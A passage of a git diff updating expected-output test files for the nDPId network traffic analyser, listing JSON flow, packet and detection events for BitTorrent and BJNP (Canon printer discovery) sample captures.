+00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":299,"packets-processed":299,"total-skipped-flows":0,"total-l4-data-len":285982,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":24,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":24,"total-idle-flows":24,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":134,"global_ts_msec":1455469982106} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 299/299 diff --git a/test/results/bjnp.pcap.out b/test/results/bjnp.pcap.out index 274cdd312..c99d800ea 100644 --- a/test/results/bjnp.pcap.out +++ b/test/results/bjnp.pcap.out 
@@ -1,38 +1,58 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bjnp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467725378685} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725378685} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383705} 
-00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383909} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384113} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384313} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384517} 
-00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384721} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384921} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385125} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385329} 
-00314{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} -00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1467725385329} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467725378685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725378685,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1467725383705,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383705,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1467725383909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383909,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1467725384113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384113,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1467725384313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384313,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1467725384517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384517,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1467725384721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384721,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1467725384921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384921,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467725385125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385125,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467725385329,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385329,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 